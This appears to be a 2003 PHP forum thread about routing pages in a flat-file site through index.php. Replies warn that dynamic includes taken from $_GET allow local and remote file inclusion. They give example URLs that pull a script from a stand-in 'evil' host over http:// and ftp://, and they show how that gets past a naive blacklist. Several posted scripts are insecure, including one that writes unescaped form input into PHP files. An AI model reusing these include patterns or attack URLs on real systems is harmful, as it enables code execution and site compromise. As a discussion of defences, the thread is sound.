Extending a single page management script

Posted: Mon Dec 15, 2003 8:16 pm
by Mobius Man
I've created a script (well, two different ones). The first one is for my index.php page, which is a simple include switch that keeps it to a single page design:

Code: Select all

<?php

ini_set('include_path', 'http://mobius_man.t35.com');
switch ($_GET['page']) {
    case 'articles':
        include('articles.php');
        break;
    case 'contact':
        include('contact.php');
        break;
    case 'spotlight':
        include('spotlight.php');
        break;
    case 'fan':
        include('fan.php');
        break;
    case 'multimedia':
        include('multimedia.php');
        break;
    case 'links':
        include('links.php');
        break;
    case null:
        include('./news/news.txt');
        break;
    default:
        include('error.php');
        break;
}


?>

That works fine. Secondly, I have a script that when I want to create pages for these pages (i.e. index -> articles -> page), it makes links on the selected page (articles.php for example). This is ok as well. The problem is, how can I include these links on the page as I do with the index.php and those branch files?

Basically I want the index ->articles.php ->page linked from articles.php to all be a single-page deal.

Posted: Mon Dec 15, 2003 8:35 pm
by McGruff
First, dynamic includes might be a better option than a switch / case - can be much quicker with many cases. You'd need to prefix file names for security if you are opening files based on values passed via GET:

Code: Select all

<?php

include('prefix_' . $_GET['page']);

?>
With the null & default cases:

Code: Select all

<?php

function loadPage()
{
    if(is_null($_GET['page']))
    {
        // include .. etc
        return;
    }
    if(!is_file('prefix_' . $_GET['page']))
    {
        // include .. etc
        return;
    }
    include('prefix_' . $_GET['page']);
}
?>
This requires strict file naming conventions, of course.

I couldn't quite understand your query: are you making a front controller? Some recent discussion on this here viewtopic.php?t=15107

Posted: Mon Dec 15, 2003 8:44 pm
by Mobius Man
Basically I'm trying to make a basic manager using flat files (I have no access to SQL). :(

This is the file that makes the links, and writes the information to the pages:

Code: Select all

<?php
include ("news/config.php");
$id = $_POST["id"];
$filename = $_POST["id"];
$date = date("F j, Y");
$name = $_POST["name"];
$email = $_POST["email"];
$title = $_POST["title"];
$content = $_POST["content"];
$pass = $_POST["password"];

if ($password == $pass)
{

$filename2 = 'articles.php';

// Prepend the new link to the existing contents of articles.php
$file = file_get_contents($filename2);
$fp = fopen($filename2, "w");
fwrite($fp, "<a href=articles/$id>$title</a> - $date <br /><br />");
fwrite($fp, $file);
fclose($fp);

chdir("articles");

$file = file_get_contents($filename);
$fp = fopen($filename, "w");
fwrite($fp, "<h1>$title</h1> Posted by: <a href=mailto:$email>$name</a>  $date <br /><br /><br /><br /> $content</font> <br />");
fwrite($fp, $file);

fclose($fp);

?>
<html>
<head>
<title> Page Editor</title>
</head>
<body bgcolor="#6B859C">
<?php echo "<font face=$font size=$fontsize>";
      echo "<center><h2>SUCCESS!!</h2></center>";
      echo "<center>Your news has been successfully posted.<br />";
      echo "Go To: <a href=$websiteurl>$websitename</a> | <a href=page_create.php>Make Another Post</a></center></font>";


?>
</body>
</html>
<?php }
 else {
 echo "Wrong Password <a href=news.php>Try again</a>.";
}
?>

Posted: Tue Dec 16, 2003 3:07 pm
by basdog22
instead of:

Code: Select all

<?php 

ini_set('include_path', 'http://mobius_man.t35.com'); 
switch ($_GET['page']) {
    case 'articles': 
        include('articles.php'); 
        break; 
    case 'contact': 
        include('contact.php'); 
        break; 
    case 'spotlight': 
        include('spotlight.php'); 
        break; 
    case 'fan': 
        include('fan.php'); 
        break; 
    case 'multimedia': 
        include('multimedia.php'); 
        break; 
    case 'links': 
        include('links.php'); 
        break; 
    case null: 
        include('./news/news.txt'); 
        break; 
    default: 
        include('error.php'); 
        break; 
}


?>
Do this:

Code: Select all

$file=$_GET['page'];
include "$file.php";
easier and safer.... I hope :roll:

Posted: Tue Dec 16, 2003 6:04 pm
by DuFF
basdog22 wrote: easier and safer.... I hope :roll:
Easier, but not safer. Anyone could just use the URL query to bring up any PHP file in the directory. Example:

http://mobius_man.t35.com/index.php?page=path/to/secret.php

Mobius Man, could you please explain what your problem is in more detail? I don't understand what you are having problems with.

Posted: Tue Dec 16, 2003 6:24 pm
by qads
you want to edit the files with php? :?

Posted: Wed Dec 17, 2003 12:42 am
by vigge89
you can use something like this:

Code: Select all

<?php

//Include content
if (isset($_GET['id'])) {
	$id = "".addslashes($_GET['id']).".php";
	if (file_exists($id)) {
		include ($id); //Include chosen page
	}
	else {
		include ("404.php"); //If the file requested does not exist
	}
}
else {
	include ("start.php"); //Default page
}


?>

Posted: Wed Dec 17, 2003 2:54 pm
by basdog22
Anyone could just use the URL query to bring up any PHP file in the directory
this can be handled with: sessions, referer trick etc :wink:

Posted: Wed Dec 17, 2003 5:24 pm
by Weirdan
DuFF wrote:
basdog22 wrote: easier and safer.... I hope :roll:
Easier, but not safer. Anyone could just use the URL query to bring up any PHP file in the directory.
Even more, it could be used to include the script from remote host:

Code: Select all

http://mobius_man.t35.com/index.php?page=http://evil.weirdan's.host.com/path/to/secret
It will include (and execute) the script from http://evil.weirdan's.host.com/path/to/secret.php.

Posted: Thu Dec 18, 2003 12:38 am
by basdog22
http://mobius_man.t35.com/index.php?page=http://evil.weirdan's.host.com/path/to/secret
8O 8O 8O

Never thought of that. thanks weirdan :wink:

but again:

Code: Select all

<?php
if (eregi("http://",$page))
{
 echo "I don't like you!!!";
}
...
..

?>
wouldn't do the trick?

Posted: Thu Dec 18, 2003 2:34 am
by m3mn0n
lol There is nothing wrong with what he uses, I use the exact same thing. And on most servers I've tested the different page switchers, the difference in script execution is not even a hundredth of a second; so no biggie. And I prefer to define what pages are able to be called instead of allowing anything within a directory, based on the file name. Maybe he does too.

Regarding your article manager, what is wrong with what you're trying to do? And how can we help?

Posted: Thu Dec 18, 2003 3:14 pm
by Weirdan
basdog22 wrote:
http://mobius_man.t35.com/index.php?page=http://evil.weirdan's.host.com/path/to/secret
8O 8O 8O

Never thought of that. thanks weirdan :wink:

but again:

Code: Select all

<?php
if (eregi("http://",$page))
{
 echo "I don't like you!!!";
}
...
..

?>
wouldn't do the trick?
it will. But then I'll change the url to:

Code: Select all

http://mobius_man.t35.com/index.php?page=ftp://evil.weirdan's.host.com/path/to/secret
;)
use the basename function to get rid of traversals and xss attacks.
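
Added example, not code posted by anyone in this thread: the "http://" blacklist discussed above run beside an allowlist resolver that applies basename() and only ever returns a fixed set of file names. The function names resolve_page() and blacklist_allows(), the evil.example host and the sample values are assumptions made for illustration; the page names are the ones from the first post.

```php
<?php
// Added example, not code from the thread. Page names come from the first post;
// the function names and sample request values are constructed for illustration.

const PAGES = ['articles', 'contact', 'spotlight', 'fan', 'multimedia', 'links'];

// The blacklist proposed in the thread: reject only values containing "http://".
// (stripos stands in for eregi, which was removed in PHP 7.)
function blacklist_allows(string $page): bool
{
    return stripos($page, 'http://') === false;
}

// Allowlist resolver: the request value is only compared against known names and
// never reaches include() itself. basename() is applied first, as suggested in
// the thread, so a value carrying directory parts or a URL scheme no longer
// equals its own last component and is rejected.
function resolve_page(?string $page): string
{
    if ($page === null || $page === '') {
        return './news/news.txt';      // default page from the first post
    }
    $name = basename($page);
    if ($name !== $page || !in_array($name, PAGES, true)) {
        return 'error.php';            // altered by basename() or not a known page
    }
    return $name . '.php';
}

// Constructed request values, mirroring the cases discussed in the thread.
$samples = [
    null,
    'articles',
    'nonexistent',
    'path/to/secret',
    'http://evil.example/path/to/secret',
    'ftp://evil.example/path/to/secret',
];

foreach ($samples as $value) {
    printf(
        "%-40s blacklist:%-6s resolver:%s\n",
        var_export($value, true),
        blacklist_allows((string) $value) ? 'allow' : 'block',
        resolve_page($value)
    );
}
```

The blacklist column shows "allow" for every value except the http:// one, while the resolver maps everything outside the fixed list to error.php.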

Posted: Thu Dec 18, 2003 3:38 pm
by Mobius Man
Wow! There's been a lot of posts since I was last on.

Basically, my problem is this. I want to include pages branching from a page off of index.php

For example:

index.php -> articles.php --- this works fine. However...


index.php -> articles.php -> a linked page from articles.php ---

instead of being included on the same page as articles.php, it goes directly to the file. I want everything to stay as it would in index.php.

Posted: Fri Dec 19, 2003 8:07 am
by m3mn0n
?p=articles which requires articles.php; and within articles.php, you require an article be called from the GET method also. So the URL would be something like ?p=articles&id=2925.
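
Added example, not code posted by anyone in this thread: one way to route the ?p=articles&id=2925 form of URL so that an article is rendered through index.php rather than linked to directly. The functions route() and article_link(), the digits-only rule for id and the articles/ directory layout are assumptions for illustration.

```php
<?php
// Added example, not code from the thread. route(), article_link() and the
// digits-only rule for id are assumptions; p and id follow the URL in the post.

const SECTIONS = ['articles', 'contact', 'spotlight', 'fan', 'multimedia', 'links'];

// Map one query string to the single file index.php would include.
function route(string $queryString): string
{
    parse_str($queryString, $q);
    $p = $q['p'] ?? null;
    if ($p === null) {
        return './news/news.txt';              // default page from the first post
    }
    if (!is_string($p) || !in_array($p, SECTIONS, true)) {
        return 'error.php';                    // arrays and unknown names end here
    }
    if ($p !== 'articles' || !isset($q['id'])) {
        return $p . '.php';                    // plain section page
    }
    $id = $q['id'];
    // Digits only: no slash, dot or URL scheme can reach the path below.
    if (!is_string($id) || !ctype_digit($id)) {
        return 'error.php';
    }
    return 'articles/' . $id;                  // article file, shown inside index.php
}

// Link the page-creation script would write instead of href=articles/$id.
function article_link(string $id, string $title): string
{
    return sprintf(
        '<a href="?p=articles&amp;id=%s">%s</a>',
        rawurlencode($id),
        htmlspecialchars($title, ENT_QUOTES)
    );
}

// Constructed query strings.
$queries = ['', 'p=articles', 'p=articles&id=2925', 'p=articles&id=../2925',
            'p[]=articles', 'p=nope'];
foreach ($queries as $qs) {
    printf("%-24s -> %s\n", $qs === '' ? '(none)' : $qs, route($qs));
}
echo article_link('2925', 'First <b>post</b>'), "\n";
```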

Posted: Fri Dec 19, 2003 2:46 pm
by basdog22
weirdan :wink: :wink:

Thanks :D basename rules 8)


i will use it for another script i am working on. you can really play with this one :wink: